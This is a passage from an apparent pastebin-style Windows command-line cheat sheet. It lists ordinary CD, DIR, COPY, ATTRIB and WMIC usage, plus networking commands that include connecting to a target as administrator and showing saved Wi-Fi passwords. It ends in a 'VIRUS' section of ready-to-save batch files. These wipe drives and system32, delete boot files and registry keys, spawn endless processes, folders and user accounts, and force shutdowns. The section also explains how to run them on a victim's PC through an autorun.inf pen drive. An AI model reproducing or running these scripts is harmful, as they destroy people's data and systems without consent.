  1781. [MD] type. 2>EmptyFile.txt
  1782. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1783. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1784. [CD] CD [/D] [drive:][path]
  1785. [CD] CD
  1786. [CD] CD\Program Files
  1787. [CD] CD %USERPROFILE%
  1788. [CD] CD..
  1789. [CD] CD..\..
  1790. [CD] CD\
  1791. [CD] CD\Windows
  1792. [CD] CD\windows\system32
  1793. [CD] CD /d E:\Pics
  1794. [CD] CHDIR [/D] [drive:][path]
  1795. [CD] CHDIR [..]
  1796. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1797. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1798. [CLIP] CLIP /?
  1799. [CLIP] command | clip
  1800. [CLIP] DIR | CLIP
  1801. [CLIP] CLIP < README.TXT
  1802. [CLIP] TYPE DIR /B > List.txt
  1803. [CLIP] CMD /R DIR /B > List.txt
  1804. [CLIP] DIR > List.txt
  1805. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1806. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1807. [DIR] DIR /?
  1808. [DIR] DIR \*.* /S /B /A
  1809. [DIR] DIR /ad
  1810. [DIR] DIR /ash
  1811. [DIR] DIR /a-d
  1812. [DIR] DIR /a:d
  1813. [DIR] DIR /b
  1814. [DIR] DIR /-c
  1815. [DIR] DIR /D
  1816. [DIR] DIR /L
  1817. [DIR] DIR /-N
  1818. [DIR] DIR /OD
  1819. [DIR] DIR /O-D
  1820. [DIR] DIR /P
  1821. [DIR] DIR /Q
  1822. [DIR] DIR /R
  1823. [DIR] DIR /S
  1824. [DIR] DIR /TC
  1825. [DIR] DIR /W
  1826. [DIR] DIR /a:s
  1827. [DIR] DIR \*.mp3 /s
  1828. [DIR] DIR \*.mp3 /s /p
  1829. [DIR] DIR \*.mp3 /s /b > filename.txt
  1830. [DIR] DIR \*.txt /s /b /a |clip
  1831. [DIR] DIR *.txt
  1832. [DIR] DIR /B /S \Mmystuff > File.txt
  1833. [DIR] DIR /O:gne OR DIR /O:S OR DIR /O:D
  1834. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1835. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1836. [ATTRIB] ATTRIB +h %%0 Bat File hide
  1837. [ATTRIB] ATTRIB +S +H "E:\*" /S /D
  1838. [ATTRIB] ATTRIB -S -H -R /s /d *.*
  1839. [ATTRIB] ATTRIB -S -H -R /s /d G:\*.*
  1840. [ATTRIB] set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  1841. [ATTRIB] set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  1842. [ATTRIB] ATTRIB To hide all files and subfolders in your target location,
  1843. [ATTRIB] ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  1844. [ATTRIB] ATTRIB -h c:\config.sys
  1845. [ATTRIB] ATTRIB -h -r -s c:\boot\bcd
  1846. [ATTRIB] ATTRIB +a f:*.* & attrib -a f:*.bak
  1847. [ATTRIB] ATTRIB myimage.jpg
  1848. [ATTRIB] ATTRIB Run command prompt as an administrator For Virus Remove
  1849. [ATTRIB] ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  1850. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1851. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1852. [COPY] COPY *.txt D:\
  1853. [COPY] COPY *.* D: OR COPY * D:\Folder /y
  1854. [COPY] COPY sourceFile destinationFile OR XCOPY sourceFile destinationFile
  1855. [COPY] COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  1856. [COPY] COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  1857. [COPY] COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  1858. [COPY] To COPY all files in current folder to another folder
  1859. [COPY] COPY * D:\dir1\dir2
  1860. [COPY] COPY *.* D:
  1861. [COPY] COPY "computer hope.txt" hope
  1862. [COPY] COPY myfile1.txt+myfile2.txt , combines Files contents
  1863. [COPY] COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  1864. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1865. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1866. [WMIC] ~~~**** WMIC ALL COMMAND'S NOT WORK N.HTA***~~~
  1867. [WMIC] WMIC ComputerSystem GET Model
  1868. [WMIC] WMIC computersystem get name,systemtype
  1869. [WMIC] WMIC bios get serialnumber
  1870. [WMIC] WMIC csproduct get identifyingnumber
  1871. [WMIC] WMIC nic get macaddress,description
  1872. [WMIC] WMIC baseboard get product,Manufacturer,version,serialnumbe
  1873. [WMIC] WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  1874. [WMIC] WMIC process get workingsetsize,commandline
  1875. [WMIC] WMIC partition get name,size,type
  1876. [WMIC] WMIC COMPUTERSYSTEM GET MANUFACTURER
  1877. [WMIC] WMIC csproduct get version
  1878. [WMIC] WMIC service list brief
  1879. [WMIC] WMIC process list brief
  1880. [WMIC] WMIC startup list brief
  1881. [WMIC] WMIC process where name="firefox.exe" call terminate
  1882. [WMIC] WMIC output to file get all process name Save
  1883. [WMIC] WMIC /output:"C:\output.txt"
  1884. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1885. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1886. [NET] Ping =xample, you can type in Command prompt ping 8.8.8.8 which belongs to Google.
  1887. [NET] nslookup = nslookup www.google.com
  1888. [NET] arp = You can try typing arp-a in command prompt.
  1889. [NET] ipconfig =You can type in command prompt “ipconfig” or “ipconfig /all“
  1890. [NET] ipconfig /release (this will release your IP)
  1891. [NET] ipconfig /renew (this will renew your iP)
  1892. [NET] netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  1893. [NET] Route =You can type in command prompt “route print“
  1894. [NET] Net View =You can type in command prompt “net view x.x.x.x or computername“
  1895. [NET] Net User =Net User "Enter" , Net User Najeeb "Enter"
  1896. [NET] Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  1897. [NET] Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  1898. [NET] Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  1899. [NET] Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  1900. [NET] iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  1901. [NET] Pathping =
  1902. [NET] Getmac =
  1903. [NET] Netsh =
  1904. [NET] ftp = ftp 192.168.1.80
  1905. [NET] ssh = ssh [email protected]
  1906. [NET] Netstat =
  1907. [NET] tracert =tracert www.google.com
  1908. [NET] Net wlan show profile "Enter"
  1909. [NET] Net wlan show profile "wifi Name" key=clear "Enter"
  1910. [NET] Help =whatevercommand /help OR whatevercommand /?
  1911. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1912. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1913. [VIRUS] EVERY VIRUS SAVE (NOTEPADE) SAVE.BAT
  1914. [VIRUS] C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  1915. [VIRUS] 1 Unlimited Folder flooded prank
  1916. [VIRUS] @echo off
  1917. [VIRUS] : x
  1918. [VIRUS] md %%random%%
  1919. [VIRUS] /folder.
  1920. [VIRUS] goto x
  1921. [VIRUS] 2 ---------------------------------
  1922. [VIRUS] This will create unlimited no.of folders In Drive
  1923. [VIRUS] @echo off
  1924. [VIRUS] :VIRUS
  1925. [VIRUS] cd /d C:
  1926. [VIRUS] md %%RANDOM%%
  1927. [VIRUS] cd /d D:
  1928. [VIRUS] md %%RANDOM%%
  1929. [VIRUS] cd /d E:
  1930. [VIRUS] md %%RANDOM%%
  1931. [VIRUS] goto VIRUS
  1932. [VIRUS] 3 --------------------------------
  1933. [VIRUS] DIRVE FILES AND FOLDER DELETE
  1934. [VIRUS] @echo off
  1935. [VIRUS] del D:\*.* /f /s /q
  1936. [VIRUS] del E:\*.* /f /s /q
  1937. [VIRUS] del F:\*.* /f /s /q
  1938. [VIRUS] del G:\*.* /f /s /q
  1939. [VIRUS] del H:\*.* /f /s /q
  1940. [VIRUS] del I:\*.* /f /s /q
  1941. [VIRUS] del J:\*.* /f /s /q
  1942. [VIRUS] 4 -------------------------------
  1943. [VIRUS] DIRVE DELETE
  1944. [VIRUS] rd/s/q C:\
  1945. [VIRUS] rd/s/q D:\
  1946. [VIRUS] rd/s/q E:\
  1947. [VIRUS] rd/s/q F:\
  1948. [VIRUS] 5 --------------------------------
  1949. [VIRUS] C WINDOWS DELETE
  1950. [VIRUS] @echo off
  1951. [VIRUS] attrib -r -s -h c:\autoexec.bat
  1952. [VIRUS] del c:\autoexec.bat
  1953. [VIRUS] attrib -r -s -h c:\boot.ini
  1954. [VIRUS] del c:\boot.ini
  1955. [VIRUS] attrib -r -s -h c:\ntldr
  1956. [VIRUS] del c:\ntldr
  1957. [VIRUS] attrib -r -s -h c:\windows\win.ini
  1958. [VIRUS] del c:\windows\win.ini
  1959. [VIRUS] 6 ---------------------------------
  1960. [VIRUS] Del c:\WINDOWS\system32\*.*/q
  1961. [VIRUS] 7 ---------------------------------
  1962. [VIRUS] WINDOWS REGISTRY DELETE
  1963. [VIRUS] @ECHO OFF
  1964. [VIRUS] START reg delete HKCR/.exe
  1965. [VIRUS] START reg delete HKCR/.dll
  1966. [VIRUS] START reg delete HKCR/*
  1967. [VIRUS] 8 --------------------------------
  1968. [VIRUS] Dangerous notepad virus
  1969. [VIRUS] Delete Registry Keys
  1970. [VIRUS] @ECHO OFF
  1971. [VIRUS] START reg delete HKCR/.exe
  1972. [VIRUS] START reg delete HKCR/.dll
  1973. [VIRUS] START reg delete HKCR/*
  1974. [VIRUS] :MESSAGE
  1975. [VIRUS] ECHO Your PC has been crashed.Your Dad.
  1976. [VIRUS] GOTO MESSAGE
  1977. [VIRUS] 9 --------------------------------
  1978. [VIRUS] NET CLOSE
  1979. [VIRUS] @Echo off
  1980. [VIRUS] Ipconfig /release
  1981. [VIRUS] 10 -------------------------------
  1982. [VIRUS] SHUTDOWN COMPUTER
  1983. [VIRUS] @echo off
  1984. [VIRUS] msg * Lets Roll Baby
  1985. [VIRUS] shutdown -c “Error” -s
  1986. [VIRUS] 11 -------------------------------
  1987. [VIRUS] SHUTDOWN COMPUTER
  1988. [VIRUS] shutdown -s -t 100 c “Installing Updates”
  1989. [VIRUS] 12 --------------------------------
  1990. [VIRUS] This Virus Deletes All The Content Of A Drive...
  1991. [VIRUS] @echo off
  1992. [VIRUS] del %%systemdrive%%*.* /f /s /q
  1993. [VIRUS] shutdown -r -f -t 00
  1994. [VIRUS] Save The Above Code As Anything.bat
  1995. [VIRUS] 13 --------------------------------
  1996. [VIRUS] Endless Notepad virus prank
  1997. [VIRUS] @ECHO off
  1998. [VIRUS] :top
  1999. [VIRUS] START %%SystemRoot%%\system32\notepad.exe
  2000. [VIRUS] GOTO top
  2001. [VIRUS] 14 ---------------------------------
  2002. [VIRUS] Notepad Matrix prank
  2003. [VIRUS] @echo off
  2004. [VIRUS] color 02
  2005. [VIRUS] :start
  2006. [VIRUS] echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  2007. [VIRUS] goto start
  2008. [VIRUS] 15 --------------------------------
  2009. [VIRUS] SOFTWARE BOOM
  2010. [VIRUS] @echo off
  2011. [VIRUS] :x
  2012. [VIRUS] start winword
  2013. [VIRUS] start mspaint
  2014. [VIRUS] start notepad
  2015. [VIRUS] start write
  2016. [VIRUS] start cmd
  2017. [VIRUS] start explorer
  2018. [VIRUS] start control
  2019. [VIRUS] start calc
  2020. [VIRUS] goto x
  2021. [VIRUS] 16 ----------------------------------
  2022. [VIRUS] User Account Floders
  2023. [VIRUS] This will create large no. of the user account on one’s PC and goes on
  2024. [VIRUS] @echo off
  2025. [VIRUS] :xnet
  2026. [VIRUS] user %%random%% /add
  2027. [VIRUS] goto x
  2028. [VIRUS] 17 ----------------------------------
  2029. [VIRUS] Constantly Repeat Any Messages
  2030. [VIRUS] This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”.
  2031. [VIRUS] @ECHO off
  2032. [VIRUS] :Begin
  2033. [VIRUS] msg * Hi
  2034. [VIRUS] msg * Are you having fun?
  2035. [VIRUS] msg * I am
  2036. [VIRUS] msg * Lets have fun together
  2037. [VIRUS] msg * Because you have been o-w-n-e-d
  2038. [VIRUS] GOTO BEGIN
  2039. [VIRUS] 18 --------------------------------------
  2040. [VIRUS] Virus that crashes pc
  2041. [VIRUS] @echo off
  2042. [VIRUS] attrib -r -s -h c:autoexec.bat
  2043. [VIRUS] del c:autoexec.bat
  2044. [VIRUS] attrib -r -s -h c:boot.ini
  2045. [VIRUS] del c:boot.ini
  2046. [VIRUS] attrib -r -s -h c:ntldr
  2047. [VIRUS] del c:ntldr
  2048. [VIRUS] attrib -r -s -h c:windowswin.ini
  2049. [VIRUS] del c:windowswin.ini
  2050. [VIRUS] @echo off
  2051. [VIRUS] msg * YOU GOT OWNED
  2052. [VIRUS] shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  2053. [VIRUS] Save As Anything.bat File In Notepad
  2054. [VIRUS] And Shut Down The Computer Never To Reboot Again
  2055. [VIRUS] 19 ---------------------------------
  2056. [VIRUS] Change Files To Non-working TXT Files
  2057. [VIRUS] Save As A bat File
  2058. [VIRUS] REN *.DOC *.TXT
  2059. [VIRUS] REN *.JPEG *.TXT
  2060. [VIRUS] REN *.LNK *.TXT
  2061. [VIRUS] REN *.AVI *.TXT
  2062. [VIRUS] REN *.MPEG *.TXT
  2063. [VIRUS] REN *.COM *.TXT
  2064. [VIRUS] REN *.BAT *.TXT
  2065. [VIRUS] Pause:
  2066. [VIRUS] 20 ---------------------------------------
  2067. [VIRUS] Open notepad and write
  2068. [VIRUS] [autorun]
  2069. [VIRUS] open=anything.bat
  2070. [VIRUS] Icon=anything.ico
  2071. [VIRUS] Save file as autorun.inf
  2072. [VIRUS] Step 2. Put this autorun.inf and your actual batch virus anything.bat in pendrive .
  2073. [VIRUS] When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
  2074. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2075. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement